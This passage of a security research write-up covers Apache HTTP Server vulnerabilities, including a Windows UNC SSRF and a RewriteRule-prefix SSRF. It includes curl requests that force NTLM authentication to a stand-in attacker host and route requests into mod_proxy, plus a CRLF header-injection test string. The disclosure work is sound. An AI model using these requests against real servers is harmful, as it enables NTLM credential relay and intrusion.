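```python
def safe_header_value(value: str) -> str:
    """Return `value` unchanged, or raise if it could break out of a
    single header line (CR, LF or NUL)."""
    if any(ch in value for ch in ("\r", "\n", "\0")):
        raise ValueError("control characters are not allowed in header values")
    return value


if __name__ == "__main__":
    print(safe_header_value("http://example.com/"))
    try:
        safe_header_value("http://\r\nLocation:/ooo\r\n")
    except ValueError as exc:
        print("rejected:", exc)
```

Validating at the point where the header is emitted keeps the check close to the place where the injection would otherwise happen.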

🔥 4. Other Vulnerabilities

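That more or less wraps up the Confusion Attacks series. However, a few other vulnerabilities found while researching Apache HTTP Server are worth mentioning, so they are covered separately here.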

⚔️ CVE-2024-38472 - Windows UNC-based SSRF

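First, the Windows implementation of the apr_filepath_merge() function allows UNC paths. Below are two different ways to trigger it, each allowing an attacker to force NTLM authentication to an arbitrary host: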

✔️ Triggering via HTTP Request Parser

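Triggering this directly through an HTTP request requires an additional setting in Httpd. The setting may look unrealistic at first glance, but it seems to appear often together with Tomcat (mod_jk, mod_proxy_ajp) or PATH_INFO: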

AllowEncodedSlashes On

In addition, since Httpd rewrote its core HTTP request parser logic after 2.4.49, triggering the vulnerability on versions greater than that requires one more setting:

AllowEncodedSlashes On
MergeSlashes Off

Two %5C sequences are enough to force Httpd to initiate NTLM authentication to attacker-server, and in practice this SSRF can be turned into RCE through NTLM Relay!

$ curl http://server/%5C%5Cattacker-server/path/to
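
Decoding the request target shows what the path turns into once the encoded backslashes are resolved. This is an illustration only: `looks_like_unc` is a hypothetical check and says nothing about how Httpd or APR actually merge the path.

```python
from urllib.parse import unquote


def looks_like_unc(decoded_path: str) -> bool:
    """True when the path, ignoring leading slashes, starts with two
    backslashes, i.e. the prefix of a Windows UNC path."""
    return decoded_path.lstrip("/").startswith("\\\\")


if __name__ == "__main__":
    decoded = unquote("/%5C%5Cattacker-server/path/to")
    print(decoded)
    print(looks_like_unc(decoded))
```

The decoded form begins with `\\attacker-server`, which Windows would treat as a remote host name rather than a local directory.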

✔️ Triggering via Type-Map

The Httpd packages shipped by Debian/Ubuntu enable Type-Map by default:

AddHandler type-map var

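By uploading a .var file to the server with its URI field set to a UNC path, you can also force the server to initiate NTLM authentication to the attacker. This is the second .var trick I have proposed 😉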

⚔️ CVE-2024-39573 - SSRF via Fully Controllable RewriteRule Prefix

Finally, when the prefix of a RewriteRule substitution in Server Config or VirtualHost context is fully controllable, Proxy and its related submodules can be invoked:

RewriteRule ^/broken(.*) $1

The following URL hands the request over to mod_proxy:

$ curl http://server/brokenproxy:unix:/run/[...]|http://path/to
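
The effect of the rule can be checked by applying the same pattern with a regular expression. This sketch only models the substitution `$1`, not mod_rewrite itself; `apply_rule` is a hypothetical helper and the backend URL in the demo is a made-up example.

```python
import re
from typing import Optional

# Same pattern as the RewriteRule above; the substitution is just "$1".
RULE = re.compile(r"^/broken(.*)")


def apply_rule(path: str) -> Optional[str]:
    """Return the rewritten path, or None when the rule does not match."""
    match = RULE.match(path)
    if match is None:
        return None
    return match.group(1)


if __name__ == "__main__":
    # Hypothetical request path; everything after /broken is attacker-chosen.
    rewritten = apply_rule("/brokenproxy:http://backend.example/")
    print(rewritten)
    print(rewritten is not None and rewritten.startswith("proxy:"))
```

Because the entire result comes from the captured group, the requester decides how the rewritten string begins, including a `proxy:` prefix.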

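However, any administrator who tests properly would realize that such a rule is impractical, so it was originally reported only in combination with another vulnerability. Unexpectedly, this behavior was also fixed as a security boundary. After the patch came out, other researchers applied the same behavior to Windows UNC and obtained an additional CVE.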

Future Works

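Finally, some thoughts on the future of this research and where it could be strengthened. Confusion Attacks remain a very promising attack surface, especially since this research focused on only two fields. Unless Apache HTTP Server undergoes structural hardening from the ground up or provides developers with good development standards, I believe more "confusions" will appear in the future!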

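What else could be improved? Different Httpd distributions ship different configuration files, so other Unix-like systems such as the RHEL family and the BSDs, and even software bundles that use Httpd, may have more escapable rewrite rules, more powerful Local Gadgets, or even unexpected symbolic link jumps. I leave these to anyone interested in continuing.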

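Finally, due to time constraints, I could not share more real-world cases found and exploited in actual websites, devices, and even open-source projects. But you can probably already imagine that the real world still hides countless unexplored rules, bypassable authentications, and CGIs lurking beneath the surface, far more than you would expect. As for how to apply the techniques from this article around the world? That is your mission now!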

Conclusion

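Maintaining an open-source project is truly difficult, especially when balancing user convenience against compatibility with older versions. The slightest oversight can lead to the whole system being compromised (for example, the disastrous CVE-2021-41773 in Httpd 2.4.49, caused by a small change in path processing logic). The entire development process requires carefully treading on top of a pile of legacy code and technical debt. So if any Apache HTTP Server developers are reading this, I want to say: thank you for your contributions!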